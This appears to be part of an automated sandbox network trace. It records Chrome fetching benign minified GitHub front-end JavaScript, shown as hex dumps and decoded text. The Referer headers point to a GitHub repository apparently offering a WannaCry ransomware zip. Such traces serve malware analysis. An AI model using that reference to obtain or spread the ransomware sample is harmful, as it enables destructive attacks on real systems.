                                                                                      2024-03-23 14:47:25 UTC1378INData Raw: 65 66 74 2d 72 61 64 69 75 73 3a 30 3b 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 70 72 65 66 65 72 73 2d 72 65 64 75 63 65 64 2d 6d 6f 74 69 6f 6e 3a 6e 6f 2d 70 72 65 66 65 72 65 6e 63 65 29 7b 61 6e 69 6d 61 74 69 6f 6e 3a 4f 76 65 72 6c 61 79 2d 2d 6d 6f 74 69 6f 6e 2d 73 6c 69 64 65 49 6e 52 69 67 68 74 20 30 2e 32 35 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 30 2e 33 33 2c 31 2c 30 2e 36 38 2c 31 29 20 30 73 20 31 20 6e 6f 72 6d 61 6c 20 6e 6f 6e 65 20 72 75 6e 6e 69 6e 67 3b 7d 7d 26 5b 64 61 74 61 2d 70 6f 73 69 74 69 6f 6e 2d 72 65 67 75 6c 61 72 3d 27 72 69 67 68 74 27 5d 7b 68 65 69 67 68 74 3a 31 30 30 76 68 3b 6d 61 78 2d 68 65 69 67 68 74 3a 75 6e 73 65 74 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 76 61 72 28 2d 2d 62 6f
                                                                                      Data Ascii: eft-radius:0;@media screen and (prefers-reduced-motion:no-preference){animation:Overlay--motion-slideInRight 0.25s cubic-bezier(0.33,1,0.68,1) 0s 1 normal none running;}}&[data-position-regular='right']{height:100vh;max-height:unset;border-radius:var(--bo
                                                                                      2024-03-23 14:47:25 UTC1378INData Raw: 40 6b 65 79 66 72 61 6d 65 73 20 4f 76 65 72 6c 61 79 2d 2d 6d 6f 74 69 6f 6e 2d 73 6c 69 64 65 55 70 7b 66 72 6f 6d 7b 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 59 28 31 30 30 25 29 3b 7d 7d 40 6b 65 79 66 72 61 6d 65 73 20 4f 76 65 72 6c 61 79 2d 2d 6d 6f 74 69 6f 6e 2d 73 6c 69 64 65 49 6e 52 69 67 68 74 7b 66 72 6f 6d 7b 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 58 28 2d 31 30 30 25 29 3b 7d 7d 40 6b 65 79 66 72 61 6d 65 73 20 4f 76 65 72 6c 61 79 2d 2d 6d 6f 74 69 6f 6e 2d 73 6c 69 64 65 49 6e 4c 65 66 74 7b 66 72 6f 6d 7b 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 58 28 31 30 30 25 29 3b 7d 7d 22 2c 22 3b 22 5d 2c 28 30 2c 64 2e 55 32 29 28 22 63 6f 6c 6f 72 73 2e 63 61 6e 76 61 73 2e 6f 76 65 72 6c 61 79
                                                                                      Data Ascii: @keyframes Overlay--motion-slideUp{from{transform:translateY(100%);}}@keyframes Overlay--motion-slideInRight{from{transform:translateX(-100%);}}@keyframes Overlay--motion-slideInLeft{from{transform:translateX(100%);}}",";"],(0,d.U2)("colors.canvas.overlay
                                                                                      2024-03-23 14:47:25 UTC1378INData Raw: 75 62 74 69 74 6c 65 3a 61 3d 22 22 2c 72 65 6e 64 65 72 48 65 61 64 65 72 3a 72 2c 72 65 6e 64 65 72 42 6f 64 79 3a 69 2c 72 65 6e 64 65 72 46 6f 6f 74 65 72 3a 73 2c 6f 6e 43 6c 6f 73 65 3a 64 2c 72 6f 6c 65 3a 63 3d 22 64 69 61 6c 6f 67 22 2c 77 69 64 74 68 3a 6d 3d 22 78 6c 61 72 67 65 22 2c 68 65 69 67 68 74 3a 67 3d 22 61 75 74 6f 22 2c 66 6f 6f 74 65 72 42 75 74 74 6f 6e 73 3a 62 3d 5b 5d 2c 70 6f 73 69 74 69 6f 6e 3a 76 3d 6b 2c 73 78 3a 45 7d 3d 65 2c 43 3d 28 30 2c 66 2e 4d 29 28 29 2c 4c 3d 28 30 2c 66 2e 4d 29 28 29 2c 5f 3d 28 30 2c 6f 2e 75 73 65 52 65 66 29 28 6e 75 6c 6c 29 3b 66 6f 72 28 6c 65 74 20 65 20 6f 66 20 62 29 65 2e 61 75 74 6f 46 6f 63 75 73 26 26 28 65 2e 72 65 66 3d 5f 29 3b 6c 65 74 20 44 3d 7b 2e 2e 2e 65 2c 74 69 74 6c 65
                                                                                      Data Ascii: ubtitle:a="",renderHeader:r,renderBody:i,renderFooter:s,onClose:d,role:c="dialog",width:m="xlarge",height:g="auto",footerButtons:b=[],position:v=k,sx:E}=e,C=(0,f.M)(),L=(0,f.M)(),_=(0,o.useRef)(null);for(let e of b)e.autoFocus&&(e.ref=_);let D={...e,title
                                                                                      2024-03-23 14:47:25 UTC1378INData Raw: 2e 5a 50 2e 68 31 2e 77 69 74 68 43 6f 6e 66 69 67 28 7b 64 69 73 70 6c 61 79 4e 61 6d 65 3a 22 44 69 61 6c 6f 67 5f 5f 54 69 74 6c 65 22 2c 63 6f 6d 70 6f 6e 65 6e 74 49 64 3a 22 73 63 2d 75 61 78 6a 73 6e 2d 33 22 7d 29 28 5b 22 66 6f 6e 74 2d 73 69 7a 65 3a 22 2c 22 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 22 2c 22 3b 6d 61 72 67 69 6e 3a 30 3b 22 2c 22 3b 22 5d 2c 28 30 2c 64 2e 55 32 29 28 22 66 6f 6e 74 53 69 7a 65 73 2e 31 22 29 2c 28 30 2c 64 2e 55 32 29 28 22 66 6f 6e 74 57 65 69 67 68 74 73 2e 62 6f 6c 64 22 29 2c 69 2e 5a 29 2c 5a 3d 61 2e 5a 50 2e 68 32 2e 77 69 74 68 43 6f 6e 66 69 67 28 7b 64 69 73 70 6c 61 79 4e 61 6d 65 3a 22 44 69 61 6c 6f 67 5f 5f 53 75 62 74 69 74 6c 65 22 2c 63 6f 6d 70 6f 6e 65 6e 74 49 64 3a 22 73 63 2d 75 61 78 6a 73
                                                                                      Data Ascii: .ZP.h1.withConfig({displayName:"Dialog__Title",componentId:"sc-uaxjsn-3"})(["font-size:",";font-weight:",";margin:0;",";"],(0,d.U2)("fontSizes.1"),(0,d.U2)("fontWeights.bold"),i.Z),Z=a.ZP.h2.withConfig({displayName:"Dialog__Subtitle",componentId:"sc-uaxjs
                                                                                      2024-03-23 14:47:25 UTC1378INData Raw: 7b 76 61 72 20 74 3b 6c 65 74 20 6e 3d 28 30 2c 63 2e 69 29 28 6e 75 6c 6c 3d 3d 3d 28 74 3d 65 2e 66 69 6e 64 28 65 3d 3e 65 2e 61 75 74 6f 46 6f 63 75 73 29 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 74 3f 76 6f 69 64 20 30 3a 74 2e 72 65 66 29 2c 61 3d 30 2c 5b 72 2c 69 5d 3d 28 30 2c 6f 2e 75 73 65 53 74 61 74 65 29 28 30 29 3b 72 65 74 75 72 6e 28 30 2c 6f 2e 75 73 65 45 66 66 65 63 74 29 28 28 29 3d 3e 7b 69 66 28 31 3d 3d 3d 72 29 7b 76 61 72 20 65 3b 6e 75 6c 6c 3d 3d 3d 28 65 3d 6e 2e 63 75 72 72 65 6e 74 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 65 7c 7c 65 2e 66 6f 63 75 73 28 29 7d 65 6c 73 65 20 69 28 72 2b 31 29 7d 2c 5b 6e 2c 72 5d 29 2c 6f 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 6f 2e 46 72 61 67 6d 65 6e 74 2c 6e 75 6c 6c 2c 65 2e 6d 61 70 28 28
                                                                                      Data Ascii: {var t;let n=(0,c.i)(null===(t=e.find(e=>e.autoFocus))||void 0===t?void 0:t.ref),a=0,[r,i]=(0,o.useState)(0);return(0,o.useEffect)(()=>{if(1===r){var e;null===(e=n.current)||void 0===e||e.focus()}else i(r+1)},[n,r]),o.createElement(o.Fragment,null,e.map((


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      58192.168.2.1649762185.199.109.1544436264C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-03-23 14:47:25 UTC736OUTGET /assets/vendors-node_modules_primer_react_lib-esm_Dialog_js-node_modules_primer_react_lib-esm_TabNav_-8321f5-2969c7508f3a.js HTTP/1.1
                                                                                      Host: github.githubassets.com
                                                                                      Connection: keep-alive
                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                      Origin: https://github.com
                                                                                      sec-ch-ua-mobile: ?0
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      sec-ch-ua-platform: "Windows"
                                                                                      Accept: */*
                                                                                      Sec-Fetch-Site: cross-site
                                                                                      Sec-Fetch-Mode: cors
                                                                                      Sec-Fetch-Dest: script
                                                                                      Referer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zip
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      2024-03-23 14:47:25 UTC687INHTTP/1.1 200 OK
                                                                                      Connection: close
                                                                                      Content-Length: 11358
                                                                                      Cache-Control: public, max-age=31536000, immutable
                                                                                      Content-Type: application/javascript
                                                                                      Last-Modified: Thu, 14 Mar 2024 21:30:27 GMT
                                                                                      ETag: 0x8DC446DF783517E
                                                                                      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
                                                                                      Via: 1.1 varnish, 1.1 varnish
                                                                                      Accept-Ranges: bytes
                                                                                      Date: Sat, 23 Mar 2024 14:47:25 GMT
                                                                                      Age: 737019
                                                                                      X-Served-By: cache-iad-kcgs7200175-IAD, cache-ewr18167-EWR
                                                                                      X-Cache: HIT, HIT
                                                                                      X-Cache-Hits: 525, 1
                                                                                      Vary: Accept-Encoding
                                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                      X-Fastly-Request-ID: 02fa719e3616588dc20eacbb3071062ecdc58052
                                                                                      2024-03-23 14:47:25 UTC1378INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 67 6c 6f 62 61 6c 54 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 3d 67 6c 6f 62 61 6c 54 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 70 72 69 6d 65 72 5f 72 65 61 63 74 5f 6c 69 62 2d 65 73 6d 5f 44 69 61 6c 6f 67 5f 6a 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 70 72 69 6d 65 72 5f 72 65 61 63 74 5f 6c 69 62 2d 65 73 6d 5f 54 61 62 4e 61 76 5f 2d 38 33 32 31 66 35 22 5d 2c 7b 37 34 33 39 30 3a 28 65 2c 72 2c 74 29 3d 3e 7b 74 2e 64 28 72 2c 7b 5a 3a 28 29 3d 3e 6b 7d 29 3b 76 61 72 20 6e 3d 74 28 36 37 32 39 34 29 2c 61 3d 74 28 31 35 33 38 38 29 2c 6f 3d 74 28 35 30 39 31 39 29 2c 69 3d 74 28 34 32
                                                                                      Data Ascii: "use strict";(globalThis.webpackChunk=globalThis.webpackChunk||[]).push([["vendors-node_modules_primer_react_lib-esm_Dialog_js-node_modules_primer_react_lib-esm_TabNav_-8321f5"],{74390:(e,r,t)=>{t.d(r,{Z:()=>k});var n=t(67294),a=t(15388),o=t(50919),i=t(42
                                                                                      2024-03-23 14:47:25 UTC1378INData Raw: 6c 61 79 3a 66 6c 65 78 3b 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 35 30 70 78 29 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 30 70 78 3b 7d 22 2c 22 3b 22 5d 2c 28 30 2c 73 2e 55 32 29 28 22 72 61 64 69 69 2e 32 22 29 2c 28 30 2c 73 2e 55 32 29 28 22 72 61 64 69 69 2e 32 22 29 2c 28 30 2c 73 2e 55 32 29 28 22 63 6f 6c 6f 72 73 2e 62 6f 72 64 65 72 2e 64 65 66 61 75 6c 74 22 29 2c 6c 2e 5a 29 3b 66 75 6e 63 74 69 6f 6e 20 79 28 7b 74 68 65 6d 65 3a 65 2c 63 68 69 6c 64 72 65 6e 3a 72 2c 62 61 63 6b 67 72 6f 75 6e 64 43 6f 6c 6f 72 3a 74 3d 22 63 61 6e 76 61 73 2e 73 75 62 74 6c 65 22 2c 2e 2e 2e 61 7d 29 7b 72 65 74 75 72 6e 20 6e 2e 43 68 69 6c 64 72 65 6e 2e 74 6f 41 72 72 61 79 28 72 29 2e 65 76 65 72
                                                                                      Data Ascii: lay:flex;@media screen and (max-width:750px){border-radius:0px;}",";"],(0,s.U2)("radii.2"),(0,s.U2)("radii.2"),(0,s.U2)("colors.border.default"),l.Z);function y({theme:e,children:r,backgroundColor:t="canvas.subtle",...a}){return n.Children.toArray(r).ever
                                                                                      2024-03-23 14:47:25 UTC1378INData Raw: 3a 69 26 26 69 2e 63 75 72 72 65 6e 74 26 26 69 2e 63 75 72 72 65 6e 74 2e 66 6f 63 75 73 28 29 29 7d 2c 5b 74 2c 6f 2c 69 5d 29 3b 6c 65 74 20 63 3d 28 30 2c 6e 2e 75 73 65 43 61 6c 6c 62 61 63 6b 29 28 28 72 2c 74 29 3d 3e 7b 69 66 28 65 2e 63 75 72 72 65 6e 74 29 7b 6c 65 74 20 6e 3d 41 72 72 61 79 2e 66 72 6f 6d 28 65 2e 63 75 72 72 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 2a 22 29 29 2e 66 69 6c 74 65 72 28 66 29 3b 69 66 28 30 3d 3d 3d 6e 2e 6c 65 6e 67 74 68 29 72 65 74 75 72 6e 3b 72 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 3b 6c 65 74 20 61 3d 64 6f 63 75 6d 65 6e 74 2e 61 63 74 69 76 65 45 6c 65 6d 65 6e 74 3b 69 66 28 21 61 29 72 65 74 75 72 6e 3b 6c 65 74 20 6f 3d 6e 2e 69 6e 64 65 78 4f 66 28 61 29 2c 69 3d
                                                                                      Data Ascii: :i&&i.current&&i.current.focus())},[t,o,i]);let c=(0,n.useCallback)((r,t)=>{if(e.current){let n=Array.from(e.current.querySelectorAll("*")).filter(f);if(0===n.length)return;r.preventDefault();let a=document.activeElement;if(!a)return;let o=n.indexOf(a),i=
                                                                                      2024-03-23 14:47:25 UTC1378INData Raw: 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7d 6c 65 74 20 66 3d 6f 2e 5a 50 2e 64 69 76 2e 77 69 74 68 43 6f 6e 66 69 67 28 7b 64 69 73 70 6c 61 79 4e 61 6d 65 3a 22 54 61 62 4e 61 76 5f 5f 54 61 62 4e 61 76 42 61 73 65 22 2c 63 6f 6d 70 6f 6e 65 6e 74 49 64 3a 22 73 63 2d 70 77 64 69 34 72 2d 30 22 7d 29 28 5b 22 22 2c 22 22 5d 2c 63 2e 5a 29 2c 76 3d 6f 2e 5a 50 2e 64 69 76 2e 77 69 74 68 43 6f 6e 66 69 67 28 7b 64 69 73 70 6c 61 79 4e 61 6d 65 3a 22 54 61 62 4e 61 76 5f 5f 54 61 62 4e 61 76 54 61 62 4c 69 73 74 22 2c 63 6f 6d 70 6f 6e 65 6e 74 49 64 3a 22 73 63 2d 70 77 64 69 34 72 2d 31 22 7d 29 28 5b 22 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 2d 31 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 61 75 74 6f 3b 22 5d 29 2c
                                                                                      Data Ascii: his,arguments)}let f=o.ZP.div.withConfig({displayName:"TabNav__TabNavBase",componentId:"sc-pwdi4r-0"})(["",""],c.Z),v=o.ZP.div.withConfig({displayName:"TabNav__TabNavTabList",componentId:"sc-pwdi4r-1"})(["display:flex;margin-bottom:-1px;overflow:auto;"]),
                                                                                      2024-03-23 14:47:25 UTC1378INData Raw: 62 4e 61 76 5f 5f 54 61 62 4e 61 76 4c 69 6e 6b 22 2c 63 6f 6d 70 6f 6e 65 6e 74 49 64 3a 22 73 63 2d 70 77 64 69 34 72 2d 33 22 7d 29 28 5b 22 70 61 64 64 69 6e 67 3a 38 70 78 20 31 32 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 22 2c 22 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 30 70 78 3b 63 6f 6c 6f 72 3a 22 2c 22 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 30 3b 22 2c 22 3b 26 3a 68 6f 76 65 72 2c 26 3a 66 6f 63 75 73 7b 63 6f 6c 6f 72 3a 22 2c 22 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 7d 26 2e
                                                                                      Data Ascii: bNav__TabNavLink",componentId:"sc-pwdi4r-3"})(["padding:8px 12px;font-size:",";line-height:20px;color:",";text-decoration:none;background-color:transparent;border:1px solid transparent;border-bottom:0;",";&:hover,&:focus{color:",";text-decoration:none;}&.
                                                                                      2024-03-23 14:47:25 UTC1378INData Raw: 75 6e 63 74 69 6f 6e 20 75 28 65 2c 72 29 7b 76 61 72 20 74 3d 72 2e 72 65 63 74 3b 72 65 74 75 72 6e 20 65 2e 68 65 69 67 68 74 21 3d 3d 74 2e 68 65 69 67 68 74 7c 7c 65 2e 77 69 64 74 68 21 3d 3d 74 2e 77 69 64 74 68 3f 74 3a 65 7d 76 61 72 20 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 35 30 7d 2c 66 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 65 7d 2c 76 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 65 5b 72 3f 22 6f 66 66 73 65 74 57 69 64 74 68 22 3a 22 6f 66 66 73 65 74 48 65 69 67 68 74 22 5d 7d 2c 70 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 72 3d 4d 61 74 68 2e 6d 61 78 28 65 2e 73 74 61 72 74 2d 65 2e 6f 76 65 72 73 63 61 6e 2c 30 29 2c 74 3d 4d 61 74 68 2e 6d 69 6e 28 65
                                                                                      Data Ascii: unction u(e,r){var t=r.rect;return e.height!==t.height||e.width!==t.width?t:e}var d=function(){return 50},f=function(e){return e},v=function(e,r){return e[r?"offsetWidth":"offsetHeight"]},p=function(e){for(var r=Math.max(e.start-e.overscan,0),t=Math.min(e
                                                                                      2024-03-23 14:47:25 UTC1378INData Raw: 74 3d 72 2e 63 61 6c 6c 62 61 63 6b 73 2e 69 6e 64 65 78 4f 66 28 65 29 3b 74 3e 3d 30 26 26 72 2e 63 61 6c 6c 62 61 63 6b 73 2e 73 70 6c 69 63 65 28 74 2c 31 29 2c 72 2e 63 61 6c 6c 62 61 63 6b 73 2e 6c 65 6e 67 74 68 7c 7c 6c 2e 64 65 6c 65 74 65 28 6f 29 2c 6c 2e 73 69 7a 65 7c 7c 63 61 6e 63 65 6c 41 6e 69 6d 61 74 69 6f 6e 46 72 61 6d 65 28 6e 29 7d 7d 7d 29 3b 72 65 74 75 72 6e 20 72 2e 6f 62 73 65 72 76 65 28 29 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 72 2e 75 6e 6f 62 73 65 72 76 65 28 29 7d 7d 7d 2c 5b 6f 5d 29 2c 66 7d 29 28 45 2c 5f 29 5b 6a 5d 3b 50 2e 63 75 72 72 65 6e 74 2e 6f 75 74 65 72 53 69 7a 65 3d 46 3b 76 61 72 20 42 3d 61 2e 75 73 65 43 61 6c 6c 62 61 63 6b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 45 2e 63 75 72 72 65 6e 74 26 26 28 45 2e
                                                                                      Data Ascii: t=r.callbacks.indexOf(e);t>=0&&r.callbacks.splice(t,1),r.callbacks.length||l.delete(o),l.size||cancelAnimationFrame(n)}}});return r.observe(),function(){r.unobserve()}}},[o]),f})(E,_)[j];P.current.outerSize=F;var B=a.useCallback(function(e){E.current&&(E.
                                                                                      2024-03-23 14:47:25 UTC1378INData Raw: 68 2c 44 5d 29 2c 65 61 3d 61 2e 75 73 65 52 65 66 28 55 29 3b 65 61 2e 63 75 72 72 65 6e 74 3d 55 3b 76 61 72 20 65 6f 3d 61 2e 75 73 65 4d 65 6d 6f 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 6f 72 28 76 61 72 20 65 3d 5b 5d 2c 72 3d 30 2c 74 3d 65 6e 2e 6c 65 6e 67 74 68 3b 72 3c 74 3b 72 2b 2b 29 21 66 75 6e 63 74 69 6f 6e 28 72 2c 74 29 7b 76 61 72 20 6e 3d 65 6e 5b 72 5d 2c 61 3d 4a 5b 6e 5d 2c 69 3d 6f 28 6f 28 7b 7d 2c 61 29 2c 7b 7d 2c 7b 6d 65 61 73 75 72 65 52 65 66 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 65 29 7b 76 61 72 20 72 3d 65 61 2e 63 75 72 72 65 6e 74 28 65 2c 4e 29 3b 69 66 28 72 21 3d 3d 69 2e 73 69 7a 65 29 7b 76 61 72 20 74 3d 50 2e 63 75 72 72 65 6e 74 2e 73 63 72 6f 6c 6c 4f 66 66 73 65 74 3b 69 2e 73 74 61 72 74 3c 74 26 26
                                                                                      Data Ascii: h,D]),ea=a.useRef(U);ea.current=U;var eo=a.useMemo(function(){for(var e=[],r=0,t=en.length;r<t;r++)!function(r,t){var n=en[r],a=J[n],i=o(o({},a),{},{measureRef:function(e){if(e){var r=ea.current(e,N);if(r!==i.size){var t=P.current.scrollOffset;i.start<t&&
                                                                                      2024-03-23 14:47:25 UTC334INData Raw: 73 74 41 6e 69 6d 61 74 69 6f 6e 46 72 61 6d 65 28 66 75 6e 63 74 69 6f 6e 28 29 7b 65 63 2e 61 70 70 6c 79 28 76 6f 69 64 20 30 2c 72 29 7d 29 7d 2c 5b 65 63 5d 29 2c 6d 65 61 73 75 72 65 3a 58 7d 7d 76 61 72 20 6d 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 72 2c 74 2c 6e 29 7b 66 6f 72 28 3b 65 3c 3d 72 3b 29 7b 76 61 72 20 61 3d 28 65 2b 72 29 2f 32 7c 30 2c 6f 3d 74 28 61 29 3b 69 66 28 6f 3c 6e 29 65 3d 61 2b 31 3b 65 6c 73 65 7b 69 66 28 21 28 6f 3e 6e 29 29 72 65 74 75 72 6e 20 61 3b 72 3d 61 2d 31 7d 7d 72 65 74 75 72 6e 20 65 3e 30 3f 65 2d 31 3a 30 7d 7d 7d 5d 29 3b 0a 2f 2f 23 20 73 6f 75 72 63 65 4d 61 70 70 69 6e 67 55 52 4c 3d 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 70 72 69 6d 65 72 5f 72 65 61 63 74 5f 6c 69 62 2d 65 73 6d
                                                                                      Data Ascii: stAnimationFrame(function(){ec.apply(void 0,r)})},[ec]),measure:X}}var m=function(e,r,t,n){for(;e<=r;){var a=(e+r)/2|0,o=t(a);if(o<n)e=a+1;else{if(!(o>n))return a;r=a-1}}return e>0?e-1:0}}}]);//# sourceMappingURL=vendors-node_modules_primer_react_lib-esm


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      59192.168.2.1649763185.199.109.1544436264C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-03-23 14:47:25 UTC698OUTGET /assets/vendors-node_modules_primer_react_lib-esm_TreeView_TreeView_js-4d087b8e0c8a.js HTTP/1.1
                                                                                      Host: github.githubassets.com
                                                                                      Connection: keep-alive
                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                      Origin: https://github.com
                                                                                      sec-ch-ua-mobile: ?0
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      sec-ch-ua-platform: "Windows"
                                                                                      Accept: */*
                                                                                      Sec-Fetch-Site: cross-site
                                                                                      Sec-Fetch-Mode: cors
                                                                                      Sec-Fetch-Dest: script
                                                                                      Referer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zip
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      2024-03-23 14:47:25 UTC687INHTTP/1.1 200 OK
                                                                                      Connection: close
                                                                                      Content-Length: 16792
                                                                                      Cache-Control: public, max-age=31536000, immutable
                                                                                      Content-Type: application/javascript
                                                                                      Last-Modified: Thu, 08 Feb 2024 11:06:17 GMT
                                                                                      ETag: 0x8DC2895F934BAEC
                                                                                      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
                                                                                      Via: 1.1 varnish, 1.1 varnish
                                                                                      Accept-Ranges: bytes
                                                                                      Date: Sat, 23 Mar 2024 14:47:25 GMT
                                                                                      Age: 856661
                                                                                      X-Served-By: cache-iad-kjyo7100051-IAD, cache-ewr18154-EWR
                                                                                      X-Cache: HIT, HIT
                                                                                      X-Cache-Hits: 533, 1
                                                                                      Vary: Accept-Encoding
                                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                      X-Fastly-Request-ID: fa75ba34b14b2627245d0e0d24fe0bd583158143
                                                                                      2024-03-23 14:47:25 UTC1378INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 67 6c 6f 62 61 6c 54 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 3d 67 6c 6f 62 61 6c 54 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 70 72 69 6d 65 72 5f 72 65 61 63 74 5f 6c 69 62 2d 65 73 6d 5f 54 72 65 65 56 69 65 77 5f 54 72 65 65 56 69 65 77 5f 6a 73 22 5d 2c 7b 38 31 34 35 35 3a 28 65 2c 74 2c 72 29 3d 3e 7b 72 2e 64 28 74 2c 7b 4c 3a 28 29 3d 3e 46 7d 29 3b 76 61 72 20 6e 3d 72 28 38 35 35 32 39 29 2c 6c 3d 72 28 38 36 30 31 30 29 2c 69 3d 72 28 36 37 32 39 34 29 2c 6f 3d 72 28 31 35 33 38 38 29 2c 61 3d 72 28 33 37 39 30 34 29 2c 63 3d 72 28 37 34 31 32 31 29 2c 73 3d 72 28 39 37 30 31 31 29 2c
                                                                                      Data Ascii: "use strict";(globalThis.webpackChunk=globalThis.webpackChunk||[]).push([["vendors-node_modules_primer_react_lib-esm_TreeView_TreeView_js"],{81455:(e,t,r)=>{r.d(t,{L:()=>F});var n=r(85529),l=r(86010),i=r(67294),o=r(15388),a=r(37904),c=r(74121),s=r(97011),
                                                                                      2024-03-23 14:47:25 UTC1378INData Raw: 3d 7b 68 65 69 67 68 74 3a 33 32 7d 3b 66 75 6e 63 74 69 6f 6e 20 41 28 65 2c 74 29 7b 76 61 72 20 72 2c 6e 3b 6c 65 74 20 6c 3d 28 30 2c 45 2e 4a 29 28 65 29 2c 7b 68 65 69 67 68 74 3a 69 7d 3d 6e 75 6c 6c 21 3d 3d 28 72 3d 6e 75 6c 6c 3d 3d 74 3f 76 6f 69 64 20 30 3a 74 2e 67 65 74 42 6f 75 6e 64 69 6e 67 43 6c 69 65 6e 74 52 65 63 74 28 29 29 26 26 76 6f 69 64 20 30 21 3d 3d 72 3f 72 3a 62 2c 6f 3d 6e 75 6c 6c 21 3d 3d 28 6e 3d 6e 75 6c 6c 3d 3d 6c 3f 76 6f 69 64 20 30 3a 6c 2e 63 6c 69 65 6e 74 48 65 69 67 68 74 29 26 26 76 6f 69 64 20 30 21 3d 3d 6e 3f 6e 3a 77 69 6e 64 6f 77 2e 69 6e 6e 65 72 48 65 69 67 68 74 3b 72 65 74 75 72 6e 20 4d 61 74 68 2e 66 6c 6f 6f 72 28 6f 2f 69 29 7d 6c 65 74 20 78 3d 69 2e 63 72 65 61 74 65 43 6f 6e 74 65 78 74 28 7b
                                                                                      Data Ascii: ={height:32};function A(e,t){var r,n;let l=(0,E.J)(e),{height:i}=null!==(r=null==t?void 0:t.getBoundingClientRect())&&void 0!==r?r:b,o=null!==(n=null==l?void 0:l.clientHeight)&&void 0!==n?n:window.innerHeight;return Math.floor(o/i)}let x=i.createContext({
